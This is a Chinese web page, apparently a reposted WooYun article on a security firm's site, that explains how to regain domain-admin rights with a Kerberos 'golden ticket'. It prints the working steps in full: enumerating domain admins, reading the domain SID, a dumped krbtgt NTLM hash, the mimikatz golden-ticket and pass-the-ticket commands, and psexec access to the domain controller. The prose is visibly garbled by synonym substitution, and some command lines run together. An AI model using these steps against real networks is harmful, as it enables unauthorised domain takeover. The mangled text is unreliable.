|
|
|
联系客服020-83701501

域渗透的金之钥匙

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
域浸透的金之钥匙

0x00 奇文瑰句

连年很少搞内网浸透了,这几年开展的快啊,看了A牛翻译的<<Fireeye Mandiant 2014 安全陈说 Part1>> ,发明趋势凡是powershell脚本化了。想当年碰着的域控凡是windows 2003的,找友好要些vbscript脚本自动化,此后那啥那啥的。当初搞域除了前段年光出的MS14068,还有龙哥翻译的(http://drops.wooyun.org/papers/576),不晓得还有什么新法子,心中还有激情,如果想交换的友好,或者加我聊聊。

0x01 金之钥匙

我正本发过一个微博说

这即是我说的金之钥匙,把持这个的条件是你在正本搞定域控的时候,曾经导出过域用户的HASH,异常是krbtgt 这个用户的。但是在你在内网干其他事情的时候,活儿不细,被人家发明晰,你拥有的域办理员权限掉了,你当初还有一个平时的域用户权限,办理员做加固的时候 又忘却批改krbtgt密码了(很常见),咱们还是能重新返来,步骤如下:

要重新拿回域办理员权限,起首要先晓得域内的办理员有谁

Default
1 C:\Users\hydra>net group "domain admins" /domain

我这里的履行环境,通过截图或者看到域办理员是administrator

我还要晓得域SID是啥

Default
1 C:\Users\hydra>whoami /user

我的域SID是

Default
1 S-1-5-21-3883552807-251258116-2724407435

还有最告急的krbtgt用户的ntlm哈希,我正本导出的是

Default
1 krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::

此后该用神器mimikatz出场了,依次实验

Default
1234 mimikatz # kerberos::purgemimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribimimikatz # kerberos::ptt Administrator.kiribimimikatz # kerberos::tgt

到当初,咱们又重新拥有域办理员权限了,或者考证下

Default
12 E:\&gt;net use \\WIN-0DKN2AS0T2G\c$E:\&gt;psexec.exe \\WIN-0DKN2AS0T2G cmd

0x02 后话闲扯

呃,感应这个法子比https://www.91ri.org/14442.html这个等闲些,文章写了好久了,不绝凑不出更多的字数,就没发。。嗯。。。懒了。。

?[via@mickey]

注:本文系乌云官方受权转载,未经乌云官方受权请勿转载本文!

数安新闻+更多

证书相关+更多